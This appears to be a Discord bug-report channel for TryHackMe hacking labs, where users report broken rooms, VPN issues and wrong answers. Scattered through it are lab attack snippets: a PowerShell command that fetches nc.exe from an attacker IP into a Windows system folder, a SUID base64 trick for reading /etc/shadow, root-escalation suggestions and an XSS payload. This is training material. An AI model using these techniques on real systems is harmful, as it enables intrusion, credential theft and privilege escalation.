#room-bugs
Gave +1 Rep to @rugged canyon
Room - Linux Privilege Escalation
LinkURL - https://tryhackme.com/room/linprivesc#
Task: Privilege Escalation: NFS
Error:
Pretty sure I've found a bug with Kali vs the remote host. When compiling C code then running it on the remote host I get "./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)"
So it seems the GLIBC version is mismatched on the Kali box vs the remote host. I was going to install an older version on the Kali box but I'm going to try with the Attackbox instead
Not sure if this is me or not, but when I try and start the machine attached to https://tryhackme.com/room/linprivesc# task 3, nothing happens. I waited 5 minutes and still nothing. But I am able to start the attack box
I've been having problems starting up machines most of today, I think there's something going on...
First time I've ever had the issue
It's a known problem right now, THM are looking in to it.
Oh yeah, just seen the posts in #site-support channel, thanks. 🙂
Gave +1 Rep to @quaint sparrow
Room - Network Services
LinkURL - https://tryhackme.com/room/networkservices
Task: Enumerating SMB, TELNET and FTP
Error: does not disploy the room
There are currently issues with some VMs on THM, staff are aware and working on it 🙂
Thank you very much for informing
Same is happening to me! Machine_IP doesn't update
Thanks!
Gave +1 Rep to @mild fossil
Yea I think all the deployable machines are down
Yep, I tried 3 different ones and was starting to think it was my machine, but neither my VMs nor my host machine were connecting. Glad to know everything's in order on this end!
It fs is I’m sure they’ll fix it later today
well that is what you get for trying to cross compile... search for the error on this discord server and you will see countless examples of how to exploit it using living off the land and copying the bash from the target machine and giving that the suid bit
Thanks, you're the best! Definite noob mistake here - I should have done a bit more searching in here before getting all stoked I'd found a bug, hah! Super useful for actual in the wild issues though as versions are going to be all sorts of mismatched!
Gave +1 Rep to @rugged canyon
no problem
there may be a bug with the redline room can Staff DM me
Can you describe your issue please
in DM so no spoilers
Here please, just use spoiler text ||message||
redline room task #4 question #2 Provide the BIOS Version for the workstation.
input the correct answer but it still says incorrect, watching several online walkthroughs they put in the same answer and answer is accepted
I have screenshots
I don't know what spoiler text is
can you fix it?
screenshots not spoiler free sent to your DM
thank you very much, that workaround was successful
VulnNet: Roasted can take up to 6 minutes to boot, and after 1 hour it shuts down by itself even if there is almost 1h left. Just wanted to bring that up as it's not the first time I've seen that for a Windows VM.
Hello, I have a small problem. I am currently at OWASP Juice Shop, task 5. After I click on 'About Us', the menu won't disappear. Could this be a bug?
Hello, I have a problem whereas I try to enter a room it will just get stuck on the loading circle and won't load the room, the bug appeared out of nowhere. I tried resetting the cache and cookies and using a different browser and nothing. the weird part is after I reset cookies it works, but as soon as I log in boom, endless loading circle
Hello, in Pyramid of pain (https://tryhackme.com/room/pyramidofpainax) it seems to me that Task 9, Practical: The Pyramid of pain actually does not work: I am sure, I have the text correctly assigned to the pyramid's floors, but it keeps saying, Whoops... Check your answers. Fortunately the flag is not needed.
Hi guys, I am getting error in opening this link
That won't work.
It's also private for a reason.
I'm not a mod, but staff have suggested not to use this to access private rooms.
OK, but once in the past a mod suggested I do this.
I'm also speaking as someone who has been told to stop doing that trick to access rooms by the QA manager.
It was a friendly warning before a site ban was introduced.
Bypassing the private room screen may result in a ban.
Rooms that are private are not meant to be accessed for a reason:)
This isn’t a bug; private rooms are usually set private on purpose due to being outdated, old, broken, or no longer up to standards:)
I do understand that, but when a) a link in the official THM blog leads to a private room, b) a link in a room from an official path references another (private and basic) room, c) you ask because you think it is a bug and you are told to use this "hack" here by a mod. So how can I know others feel it is not suitable and worth a ban?
-> report the outdated room to staff and we will update it
-> report the outdated room to staff and we will update it
-> which moderator told you?
Muiri - see above #room-bugs message
Muiri isn’t a moderator or employee,
See two messages below: #room-bugs message
Hi to everyone... there is a machine "MarketPlace" that kicks me out of the ssh service after I've been in for 2 minutes ...
In the past, based on the writeup, the machine doesn't kick out the user...
Hello everyone,
I'm in the room titled "File Upload Vulns v2.1", task 4, second question about uploading a file and getting the flag.
The website says I successfully uploaded the file but no flag appears. I know I got the correct file to overwrite because the previous question was correct.
Any information on this?
nevermind... I figured it out...
On https://tryhackme.com/room/ice
The linked room is private
in linux priv escalation there's a bug in suid room where it doesn't say nano is a suid bit using find / -type f -perm -04000 -ls 2>/dev/null. In the walkthrough of the room nano is listed, but not for me
but I can't save or read the file for the questions
ohh yeah trying to use base64 suid
https://tryhackme.com/room/postexploit
Task 3, "File created from incompatible collector error" when putting the loot.zip into Bloodhound. I've generated the file twice, using the command given.
Spelling error in https://tryhackme.com/room/nmap01 Task 6 Question:
What is the option required to tell Nmap to use ICMP Echo to discover life hosts?
life should be "live"
there is a warning logo for not secure connection on room: https://tryhackme.com/room/attacktivedirectory
Can you show a screenshot?
I can't do anything, I'm just interested in what you mean.
can't take a pic since it's that stupid drop down popup that disappears when I try to take a pic. I'll try
I’ll check the image URLs when I get to my PC
sweet
Anybody know what this is about? This is in the NFS Section of the "Network Services 2" Room
Edit: Can't seem to attach a screenshot. Something's off about the text in that room under "Understanding NFS". Anybody else see it and know what it is?
Verify with the bot and then can send screenshots
Thank you, will do
!docs verify
Here's the screenshot
https://tryhackme.com/room/sakura
Unable to complete Task 5 "What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?".
The old URL that used to be the answer does not match and the current URL does not match
Anyone else having an issue in the Linux Fundamentals course where they get "Permission denied" when trying to SSH into tryhackme@[IP_address]?
It's the same with Linux Fundamentals 2 and 3. It seems the first time I try it works fine, but if I come back after a day and try again it keeps coming up as invalid.
I don't think there is a bug with that room, so best to move to #room-help and we can check there
ok, will post the same message there
found a bug on the following room:
https://tryhackme.com/room/xss
Filter Evasion Section On Challenge 2:
my payload:
<img src=x onerror="alert("Hello")";>
my payload has a pop up that says Hello, but I do not get the flag. @glad badger
cc @glad badger this is a never ending issue with this room; the payload is so specific
https://tryhackme.com/room/threatinteltools task 7 and 8
lets you download eml email files that according to the hashes of the attached files contain malicious/malware if you check them on virustotal or the other tools explained in the room
maybe it is intended to only be on the target machine that is in that room instead
On windowsfundamentals 3, task 3, the question is about a picture. The picture clearly states everything is fine with the computer, but the answer is that there is an issue with virus and threat protection 😛
In Sakura room Task 5 question 3:
What is the URL for the location where the attacker saved their WiFi SSIDs and passwords?
even when i put correct link is showing wrong answer
Task 2, files, discovery.py, line 5: this is the correct code: "from pymodbus.client import ModbusTcpClient as ModbusClient"
https://tryhackme.com/room/attackingics1
Thank you for posting this, that got me unstuck (using the THM box too).
Gave +1 Rep to @forest axle
Hi room bug when compiling code for task 11 on https://tryhackme.com/room/linprivesc
glibc version issue based on attacker machine. Need to update or suggest alternative
And compiling alternative glibc is a mess🥲
Hi, I think I found a bug in Password Attack Room, Task 8, SMTP
When trying Hydra output is:
[ERROR] SMTP LOGIN AUTH, either this auth is disabled or server is not using auth: 502 5.5.2 Error: command not recognized
which looks like server is not understanding AUTH commands.
EHLO pantoufles
250-mail.thm.labs
250-SIZE 10240000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
AUTH LOGIN
502 5.5.2 Error: command not recognized
February 27, 2023
This was a huge help thanks, thought I was going crazy.
Gave +1 Rep to @raw crypt
Hello, the Zeek Room was the input with value incorrect.
This is a question.
This is the command:
I'm only seeing one result in the file. I looked at a writeup that said it would be 2, even though I had run the same command
@mild sequoia
Hi @copper tide
I just verified that it's working. Can you clear the logs and re-run the command? OR reboot the machine, please.
Hi,
breaching Active Directory room isn't working for me.
Web based AttackBox does not start with breachad interface (ip a doesn't show it) and obviously the AD machines don't respond to ping.
Tried VPN from my computer (and from Kali Web VM) and it exits with error:
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: timers and/or timeouts modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: --ifconfig/up options modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: route options modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: route-related options modified
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: peer-id set
Thu Mar 23 14:19:21 2023 OPTIONS IMPORT: adjusting link_mtu to 1624
Thu Mar 23 14:19:21 2023 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
Thu Mar 23 14:19:21 2023 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
Thu Mar 23 14:19:21 2023 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
Thu Mar 23 14:19:21 2023 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
Thu Mar 23 14:19:21 2023 Error: problem with tun vs. tap setting
Thu Mar 23 14:19:21 2023 Exiting due to fatal error
Same running in AttackBox
openvpn Desktop/NetworkConfigs/breachingad.ovpn
I keep finding issues, is that normal or it's just me?
Thanks
Gave +1 Rep to @hazy tiger
Definitely a bug. I had to edit the .ovpn file, change dev breachad to dev tun and change command in the room:
[thm@thm]$ systemd-resolve --interface breachad --set-dns $THMDCIP --set-domain za.tryhackme.com
to
[thm@thm]$ systemd-resolve --interface tun0 --set-dns $THMDCIP --set-domain za.tryhackme.com
Cc @glad badger @dusky junco any guidance here? Has anything changed?
With these little changes I was able to complete the room
I noticed also that if the network goes down the page reports it is running anyways
It looks like the backend setting that sets the interface as "breachingad" rather than tunX has broken somewhere along the line. @crystal bolt any ideas?
I'm not in control of the actual VPN server itself. Only the network. If I can get Internet IP of that VPN server I can take a look and alter its configuration. But haven't had any issues with these VPN servers thus far. If I get that IP I can SSH in and check what it is outputting as ovpn files and see if a change is required.
The adapter name should be breachad and not tun. That is by design and hasn't given us an issue in the past, so might just actually be cipher support that needs to be updated
@hollow star In the https://tryhackme.com/room/nmap03 room the
The concept is simple, make the scan appears to be coming from many IP addresses so that the attacker’s IP address would be lost among them.
line has a grammatical mistake, usage of the verb "make" without a subject.
Here's a good correction:
The concept is simple, make the scan appear to be coming from many IP addresses so that the attacker’s IP address would be lost among them
Please fix this, thanks in advance! 🙏
Please can you send the remote IP in your VPN file. It will tell me which vpn server to inspect
Cross-site Scripting room, Blind XSS, the recommended tool is now deprecated, but there is a new open source fork of it
Hi lateral movement network iis server is offline, can it be rebooted please
52.50.154.50
Found the issue, thanks. dev breachad is correct, but from client-common it was missing the second line which is dev-type tun. Issue should now be resolved
Gave +1 Rep to @hidden juniper
A good pentester should be able to fix issues 😉
Fixed. Thanks for pointing this out. 🙂
Gave +1 Rep to @prisma bronze
Room https://tryhackme.com/room/passwordattacks, Task 8, Brute Force SMTP.
Server does not support SMTP AUTH LOGIN:
# telnet 10.10.135.120 25
Trying 10.10.135.120...
Connected to 10.10.135.120.
Escape character is '^]'.
220-mail.thm.labs ESMTP
220 mail.thm.labs ESMTP
EHLO pippo.com
250-mail.thm.labs
250-SIZE 10240000
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
Np, thank you for fixing it 🫡
oh yeah that problem... if only shadow could recall the exact solution right now
think the solution to get the flag is to just use smtps instead
i.e the secure smtp
which would be on port 465 instead
still yeah the instructions in the room probably need updating
Will try that
It worked, thanks. I did an nmap scan, saw port 465 open, but didn't consider trying with SMTPS 😅
Gave +1 Rep to @rugged canyon
Dunno if anyone else has let you know, but should be sorted now
yeah this is shadows third reminder that this is now fixed... thanks for the info though robert
Gave +1 Rep to @misty cave
Do you want a fourth?
hehehe sure
we now got at least 3 people who get a white screen when deploying the target machine for linux fundamentals 1 and therefore cannot access the target machine to learn these basic commands... is it already on the ticket list to see if it can be fixed???? @glad badger @dusky junco
I checked and now it works correctly. Now just one more question regarding the Brim room, has the installed software been discontinued? I don't find the correct option to install on my Kali Linux or Windows. Thanks.
Gave +1 Rep to @mild sequoia
In the Windows forensic 1 and Redline room the problem also happens
oh should shadow have reported that in there instead????
Not really a bug but incident handling with splunk task 9 references threatcrowd, that site is no longer available. cert goes to the wrong address and server sends a 503
i don't know where else to post it
the questions don't need the site though
Volatility room:
Installation described wrongly. Recommended to use the following:
https://github.com/volatilityfoundation/volatility/wiki/Installation
Believe there's an issue with what appears as the private room ccpentesting where I'm getting this error
what room is linking to that????
Encryption - Crypto 101
well thanks for that info... ccpentesting was marked private because it is very very old and doesn't meet the qa standards anymore if shadow recalls correctly... so this is technically a bug in the encryption crypto 101 room if it links there
It's linked from this question regarding additional help as a hint; Would there be an alternative direction for assistance for this question?
there is a room on john the ripper that might help
https://tryhackme.com/room/johntheripper0 @ebon lark
Thank you
Gave +1 Rep to @rugged canyon
no problem
https://tryhackme.com/room/ctfcollectionvol1 task 5 appears to want you to examine html code for a flag but doesn't provide a file to examine to get that flag.
........ scratch that i feel silly now i seeked a writeup
@ocean patrolsirknyght hi. I am trying to get the Corp room first item to work and can't get it to work. I searched and found you solved it. Can you help me with the first step. I get an error about 2 arguments on download file. I typed: powershell -c "(new-object System.Net.WebClient).Downloadfile('http://10.8.133.41:8000/nc.exe', 'C:\Windows\System32\spool\drivers\color\nc.exe')"
I have found bug in SQL injection lab room from task 7
Here is photo from that task. When I run this command from attackbox, sqlmap didn't know --second-url command then I tried to learn sqlmap. I found --second-order is alternative to --second-url, I mean --second-url command doesn't work.
There is second bug also in this room
so-temper.py file that I downloaded from this room is not valid for sqlmap
unless i am mistaken somewhere, i don't think that 'mountain view' is the most popular city under Google ASN
Hey there,
I believe you are supposed to be answering questions on the screenshots in the room
Were you able to figure out and/or did anyone ever contact you on this? I'm running into the same issue right now.
would help if shadow had done said room
Hey guys, at https://tryhackme.com/room/snort room, at Task 8, there is referenced non-existing file at the VM (icmp-test.pcap).
No I never got contacted about it and if I did get contacted I never saw a message.
I'm pretty sure I ended up just dropping the room
What are you saving?
I'll have to look when I'm off work/ try and remember
check the exercise files
if they're not there you accidentally deleted them or something else went wrong, reboot the machine in that case
Thanks, yeah probably accidentally deleted them. 🙂
Gave +1 Rep to @manic raft
Are you able to get root??
https://tryhackme.com/room/linprivesc
Task 7 Privilege Escalation: SUID
Can someone please help
don't think you can easily gain a root shell there.. but you got arbitrary file read so yeah
I am able to read /etc/shadow using base64
but unable to get root
oh wait you probably have arbitrary file write too....
by redirecting the output of base64 into /etc/shadow you could probably get a root shell
though if you go that route good luck and be careful so you don't screw up the machine
you technically don't need a root shell to get the flag
I tried but getting Permission Denied error
ah okay then
if you know where the flag file is you could use the base64 binary to read the flag the same way you read /etc/shadow
which is the intended solution
shadow never got root on that either but good luck ¯_(ツ)_/¯
base64 is the suid binary in this instance
hence arbitrary file reads
@twin halo Try:
LFILE=/etc/shadow
./base64 "$LFILE" | base64 --decode
well think the used password for the root account is too hard to crack for getting a root shell that way if shadow recalls correctly
this is basically just a bonus challenge sumit set out for themselves
Yeah I am able to read files. But I want root shell
Can you run sudo?
No
I tried to append the /etc/passwd and /etc/shadow through base64
But the files are unwriteable
As the Task 7 is about SUID, I am not sure how to get root
sudo permissions are not available to all 3 users
It doesn't ask you to get root?
The task is not asking to get root.
Yes, not every technique will allow you to get root:)
So need to look other techniques?
If you were doing a CTF, yes, but this is a learning box. They might not want you to get root at this particular point so that you don't break the challenge
Ok thanks! Just wanted to confirm 👍
However, I always try to get root even if it is not intended in the task. I do not break 🙂
Gave +1 Rep to @hazy tiger
Yup! I appreciate your mindset, it is very can-do!
Just ensure not to presume there's always an option to get root, often times you're making your job harder than it needs to be:)
Hi, the following room hasn't been maintained and the answers don't match the data found online anymore. It was a nice room and it would be a shame to "lose" it. The creator seems to be unreachable. What could be done in this situation? Room: https://tryhackme.com/room/webosint
@hazy tiger ⬆️
I am in "Credentials Harvesting" room and in task no 6, there isn't any password for 10.10.237.226 SMB in windows credentials vault. I have extracted them through mimikatz
Hi everyone, I can't see the pictures from tasks "Listeners" and "Stagers" in room "Empire". As far as I can see, the images are corrupted in these tasks. Can the mods take a look at this?
Room link: https://tryhackme.com/room/rppsempire
Just an FYI, moderators aren’t employees, please read #rules
Sorry for that, I didn't know.
I am getting a different error. I have done the steps several times, but when I get into bloodhound and try to check a query, I always get this error: "NO DATA RETURNED FROM QUERY."
hello
i'm stuck
in Linux Fundamentals 2
can't access the attackbox with ssh tryhackme@"ip"
i put the password "tryhackme" but the bash tells me "Permission denied, please try again."
Have you started the machine in task 2?
Same here ..
You're 99% more than likely to be using the wrong IP.
yes
i was connected with the openvpn and started the attackbox
#room-help @plucky finch And please verify your account so you can send screenshots
!docs verify
If you're on a VM you don't need the attackbox.
On your Vm, yes. 🙂
You'll use that IP there.
ok
wait
one more question
do i have to connect the openvpn in my vm or on my own device?
Yes.
You'll always need to connect to OpenVPN so you can talk to THM machines.
in the vm and in my pc, right?
On your VM, yes.
Not your host.
Do you know how to, yes?
🙂 great, happy hacking.
What to do
room printer hacking 101
root@ip-10-10-236-74:~# git clone https://github.com/RUB-NDS/PRET && cd PRET
Cloning into 'PRET'...
fatal: unable to access 'https://github.com/RUB-NDS/PRET/': Failed to connect to github.com port 443: Connection timed out
Not a bug, you need to be a subscriber to access the internet from the attackbox
Oh i will try it just expired now lol thank u bro i will check
Gave +1 Rep to @eternal summit
https://tryhackme.com/room/investigatingwithelk101
On the 11th, which IP caused...
But the spike is on the 10th.
Hi There! Having some issues with the Local Potato room (https://tryhackme.com/room/localpotato). Every time I launch the machine it won't connect. Trying to connect via Remmina and xfreerdp on the TryHackMe VPN it is indicating that perhaps the "user" user's password has expired.
[09:55:11:311] [3148049:3148050] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[09:55:11:311] [3148049:3148050] [WARN][com.freerdp.crypto] - CN = LP
[09:55:12:814] [3148049:3148050] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_PASSWORD_EXPIRED [0xC0000071] from server
[09:55:12:814] [3148049:3148050] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_PASSWORD_EXPIRED [0x0002000E]
[09:55:12:814] [3148049:3148050] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[09:55:12:814] [3148049:3148050] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
If someone could take a look and get this resolved that would be awesome! 🙂
@eternal summit
Done!
Done!
Hi, looks like there might be some problems with https://tryhackme.com/room/investigatingwithelk101 .
In task 4 where the machine gets booted it is not possible to connect to the machine "website" via the attackbox. I had the same error yesterday, and this is now the third try, I have tried following a walkthrough but it did the same thing as I did
hey 🙂 if you're seeing the 502 gateway error with this, this means the service hasn't started up yet (ELK is quite beefy). I would recommend waiting at least 5 minutes (and even then I'd probably wait closer to 10)
For the error on the left, I've never seen that on ELK before O.o. Probably related to things not starting up properly yet. But yeah, I would say deploy the machine, wait about 10 minutes to be safe and it should work okay 🙂 If you're having to wait longer than 15 minutes to be able to login to ELK then I would terminate & re-deploy the machine and try the process again
after 8 minutes I can login
Thank you, it worked. could swear i had tried to leave it running for 15 minutes, but it worked where i left it running for 10 minutes 🙂
Gave +1 Rep to @dusky junco
Yeah, unfortunately it's a little bit "luck of the draw" in that sense. Applications such as ELK are really beefy, and even though we give it a considerable amount of resources, it can still take a bit of time to boot up.
Glad to hear it's all sorted now though!
The "final" part is what's probably confusing, it's not a bug though, the initial 1M has been spent, and you only made back 1.7M, instead of 2+
Np
made a lot of money
@crystal bolt This might not be completely intended though, made 18 trillion dollars
Linux Fundamentals Part 1
Task 7 Questions
If I wanted to replace the contents of a file named "passwords" with the word "password123", what would my command be?
Accepted Incorrect Answer:
echo passwords >> password123
This isn't a bug, your syntax is wrong.
refresh your page, it could be answer tolerance.
yeah, game has a lot of factors and a couple ways for you to earn ridiculous amounts of money. We are not balancing the meta for this game for like a year so have fun and see how much you can make 😉
Fair haha
Hello, does anyone know how I can let admins know that the answer to a task in a room is wrong due to updates?
Can you please state the room and question please
Burp Suite: The basics room
Task 7:
In which User options sub-tab can you change the Burp Suite update behaviour?
Answer: misc
Answer is wrong for Burp Suite Community Edition v2023.2.4
I think I found a bug, not sure what to call it, but I am having an issue after starting the machine for this room task 7: I used it for a little, then took a short break and came back to this bug
https://tryhackme.com/room/linprivesc#
Send the thm bot verify
Hey 👋 can you try terminate and re-deploy the machine attached to that task please? This sometimes happens. If you still have the problem after terminating and re-deploying, can you open the view up in fullscreen by pressing the two arrows in opposing directions on the bottom right of the screen and sharing the URL please?
Thanks for sending this on. I'll forward this internally.
In the mean while, the credentials to access the machine using SSH are at the top of the task. You can either use your own device (connected to the VPN) or the AttackBox 🙂
Gave +1 Rep to @paper grotto
I tried the karen and password but it didn't work
The credentials worked for me. Are you trying to SSH into the IP from the card at the top of the room? (replacing the IP address with the one that you see). Otherwise, double check the capitalisation of P and the 1 at the end
Username: karen
Password: Password1
Oh no I was trying to login through the screen that it showed me but thank you
Gave +1 Rep to @dusky junco
in room "snort", Task 3, Question "According to the official description of the snort, what kind of NIPS is it?" - the answer is not a NIPS type, it is a description at best.
just checked, its marked correct with the correct answer
In same room, a script called traffic-generator is required, it relies on "tcpreplay" which is unavailable. It cannot be installed with apt because the box has no internet connectivity.
Hey folks, how's it going? I hope you guys are doing well. Look... quick question... Has anyone noticed that some machines are getting terminated while we are in them? Like when I get the shell, some minutes pass, the machine is terminated, and I need to restart again
Archangel and ColddBox: Easy --- these are examples of this issue that I got today and yesterday
there are some other ports open
what command did you use with nmap?
you're missing ports ||21 & 22||
not sure why it didn't detect the first two
hi
in the intruder module I did the challenge and fuzzed all the creds but not a single one is right
and they all have the same length
i made sure that i am using the right username/password wordlist
👋 Could you go to #room-help please and give the room you're on, and the parameters for the intruder
ok
Bug Summary: Unable to connect to THMDC network in Enumerating Active Directory
Pages affected: https://tryhackme.com/room/adenumeration
Bug description: Unable to connect to the THMDC network in the Enumerating Active Directory room. The IP address of THMDC is 10.200.68.101, and the VPN connection is working fine without any problems when connected using a breached ovpn file. Please reset this machine or make it available as soon as possible.
box won't terminate, has expired, reload the page and still hasn't terminated even after I click repeatedly to terminate, can't ping it, Windows PrivEsc v1.0, waited almost 2 hrs for it to expire before I could start machine again and finally ping it. what can I do in future when this happens on a box to not lose time?
Are you using the VPN pack for this room?
yes
Have you changed the nameserver to that THMDC?
yes, added the IP in DNS servers
Can ya take a screenshot?
I'm going to try connecting,
Are you in a VM or Attackbox?
I've connected.
I had to correct my data-ciphers on my script, changed my nameserver (placed it at the top too)
If you're still having issues, ping me and I can help. 🙂
I am not sure whether this is a bug or not but the SOC level 1 pathway > sysinternals room > Networking utilities section. This section has a question and the answer is very clear Microsoft Corporation but the answer is not accepted even though it is the correct answer.
Send room URL?
Sysinternals https://tryhackme.com/room/btsysinternalssg
somebody else reported this yesterday and I tagged you there
Yep that is the one
I know, I'm the reason the answer was updated
@hollow star Hey, did this get updated back to Microsoft Corporation?
Talos Intelligence changed the owner info to microsoft azure as per https://talosintelligence.com/reputation_center/lookup?search=52.154.170.73. So I changed the answer accordingly especially that the hint already guides the user to use Talos. If you think this is still causing confusion please let me know. 🙂
I have received a few emails regarding it also, possibly adding a note might clear it up if there isn't one already? :)
@junior shore @placid abyss
I just ran whois and it does not give the same answer as Talos... I will fix that.
Since WHOIS and Talos Intelligence are giving different answers, I decided to stick with WHOIS since that's what's written in the original question. I updated the answer (again) and updated the hint accordingly. I hope it won't cause ambiguity any more. 🙂
Thank you B)
Thanks
this might be a bug or I did something incorrectly. Anyways: when I grabbed the bash file (note I downloaded the file directly from github on the attackbox, the wget wasn't working for me) its base perms were 644, not 645. doing sudo chmod -s bash didn't give me the final -x (645) that the room questions say should be there. Idk if this has to do with the way I obtained the file or if there's a missing step here. I had to chmod 645, then chmod -s to get the bash file with the required permission line.
Did you download the bash, or the html?
Should be 755
bash
I ran 645 then -s and that worked
the -s sets the execute to S for owner / group, so I'm not sure the 7/5 for owner / group are needed.
yeah it's chmod -s, capital S there is case ignored so it counts as correct
I meant on the questions
when I actually ran the bash script it had lower case s
does 755 / 645 actually matter given that you end up changing the x to s anyways?
Yes, because you're only changing one of them in that case. Please see my earlier messages about what 755 means and the difference between S and s.
oh I get it now, ty
Windows internals room - Virtual machine does not connect
Done!
@dusky junco
Done!
ta:)
Problem with /room/intromalwareanalysis
It wants us to have a look at the existing report from given date and platform on hybrid-analysis based on the hash of redline.
When you do, well..
https://hybrid-analysis.com/sample/e8ba49a75de083cb786e8ed84972affa11542dd913f1a07b0d44e1d45e5e22e9/622f708708751066e8250d8e
The analysis doesn't exist anymore.
/room/phishingemails4gkxh has a terrible example of "how public key cryptography works."
Shows a demonstration of how it can be used to verify sender, but useless as per secure messaging.
(It's one way, but hardly the best way, nor what the wording and image imply.)
(Also a broken link on this same task I guess I could've mentioned that too ^_^;)
Why is it that when I'm in Windows PrivEsc room with xfreerdp running and I extend the time before it expires, it disconnects my RDP and then I can't even ping the target anymore?
How long has passed on the timer?
At https://tryhackme.com/room/wiresharkpacketoperations, Task 5, the last question: What is the number of "type A DNS Queries" - expecting two-digits number, however Wireshark offers me only 3-digits one answer.
Hello good people. Just finished SDLC room and found a typo in materials. Specifically - Task 4 SDLC Phases Part 2 - Chapter 7. Operations and Maintenance. The text goes "As example of this would be Vagrant or Ansible. The code controlling operations systems must be stored, versioned, secured, and maintained.". I think it should be "An example...". Thanks. Keep up the good work.
Junior Pentesting Learning Path, Cross-Site Scripting room xssgi Task 6: Blind XSS links to xsshunter.com, this website is deprecated, no longer maintained and sign in has been disabled
I’ve just run into this myself.. wondering the same 🤔
Burp Suite: Intruder Task2: What is Intruder :
In some Burpsuite versions in Intruder Options changed name to Settings
Just here to report the same issue with ssh and Linux forensics. Username is actually lowercase ubuntu, password didn't work, and ssh only allowed public key auth.
To fix I did open split view to modify /etc/ssh/sshd_config to re-enable password authentication, restarted sshd with systemctl, then changed ubuntu's password to match the room using a sudo -i session. Can log in fine after quick bit of Linux admin lol
Huh, similar thing for Intro to Malware Analysis, in this case the ubuntu account credentials didn't work, but that's all this time. Both rooms are by umairalizafar. Guessing this hasn't come up as much since more people use split view more often than ssh via VPN
No big deal, yet again just reset the credentials using sudo -i and passwd
I know one of the malware rooms is advised to be done in the attackbox, to avoid people putting malware on their vm
Yeah this intro one is just even more preliminary than the other existing Malware Analysis rooms. The credentials here do not work in ssh, but to be fair this room leaves vague what the credentials are for
hello
Is this the right place to report broken images in rooms?
yes
the shodan room: https://tryhackme.com/room/shodan has some broken images
@green steppe
I also want to point out that several answers in the shodan room are outdated and the results shodan reports have changed
I'm almost certain there's a big bold disclaimer about this as it's not feasible to keep updating the answers
I am in Windows Forensics 2 and the VM says the requested connection doesn't exist - does the VM just not exist anymore, or is it a network issue?
In the Network Services 2 room, Task 2 there seems to be a broken img link
In the Advent of Cyber 2 [2020] room, task7, the reverse shell is not uploading, normal ?
@gleaming shadow free nitro!1!1!!1
Done!
The exploit https://github.com/Nwqda/CVE-2022-26134 linked for this room https://tryhackme.com/room/cve202226134 is dead (github user account removed).
In the Burp Suite Room in Task 7 at
In which User options sub-tab can you change the Burp Suite update behaviour?
The answer "misc" is no longer correct in the newer versions of Burp.
Known issue^
I don't see it in #1092490706385383524 ?
Mhm
@queen sphinx then
Mhh
gotta ping them all
-ban 937434386364792914 Nitro scam
🔨 Banned EDCHAVESP#9519 indefinitely
do i get cookie or smth 🙂
-ban 385032386003599361 -ddays 1 Nitro scam
🔨 Banned 4s0ck3t#6967 indefinitely
Happens to verified users too 😄
true
Ah was going to test the bot on them
ok. ill ping you next time then hehe
Tried TMM first, wasn't working
Yup, I was grabbing the stack dump, I think discordjs has had an update
Seems to be fine
Hello I’m doing « The Marketplace » room and I have found the ssh password and users but I can't access the machine.
I have checked the writeup and I have the correct password, IP address and user’s name
Sorry for my English I’m French
https://tryhackme.com/room/rppsempire
The room does not load images.
Main Sections affected: "Listeners" and "Stagers"
but a few images do not load here and there
Done!
is this considered to be updated ?
Pretty sure there's a big note in the room saying not to report these as bugs?
In the room Vulnerabilities 101, task 4, the answer to the second question needs to be updated as the author has rebranded.
Edit: not a bug, read the engagement terms and notes
Room URL: https://tryhackme.com/room/internal
Summary: Broken service
Additional Notes: (spoilers for people attempting): ||the wordpress site on target_ip/blog is broken, the theming doesn't work and any links on the website contain internal.thm instead of target_ip , making navigation difficult and login essentially impossible. ||
This is not necessarily a bug with the room, but more a problem with ||wordpress|| in general. You need to add the IP and domain that the ||wordpress ||is on to your /etc/hosts file 🙂 i.e.
TARGET_IP internal.thm and this
I am genuinely stupid, thank you Ben for the helpful reply :)
Gave +1 Rep to @dusky junco
Not at all - it catches me out and others quite often too 🙂
Im asking cuz idk, 😭
Sometimes, on virtual machines, directly on Tryhackme, I get this error: the requested connection does not exist. Please check the name and try again. Do you know where this error comes from, and how to fix it?
Yup, I faced the same issue with one room, related to Windows
After trying so much, I gave up and used my own machine
I am facing an issue while accessing the learning paths, it keeps loading forever then I get a 404 error and/or 504 errors
has anyone had issues with viewing the learning path
i just get stuck on https://tryhackme.com/paths and nothing appears
Yes, site/CDN issues presently.
Windows Fundamentals 1 box WINFUN1.1 appears to not be working. Launching the machines yields “The requested connection does not exist.”
Hi, everybody. I have a question. I am going to the WREATH room network, but I cannot scan the port with nmap. It tells me that the target ip machine is down. What is the situation?
Are you on the Wreath VPN?
yes
Very minor typo that causes a command to be incorrect:
In the Snort room https://tryhackme.com/room/snort task: Operation Mode 1: Sniff Mode
If you find the first command in the exercise you will see it's sudo snort -v-i eth0 When I think it should be sudo snort -vi eth0
Hopefully this is seen as worth reporting on, sorry if this is too minor and seen as a waste of time. Thank you.
Linux Fundamentals Part 1 - Task 7
I entered this wrong answer on accident and it got accepted??
possible answer tolerance
Huh, didn't know that was a thing here. My answer wouldn't give the expected result, so I don't think this should be allowed...
I don't know if it's question by question.
But I know for answers it does apply to, you'll get a larger tolerance for a larger answer,
WINFUN1.1 operational again
The Persist Active Directory network module has a small bug, the persistad.ovpn config file present on the AttackBox has an error on line 14, data-ciphers needs to be replaced with cipher
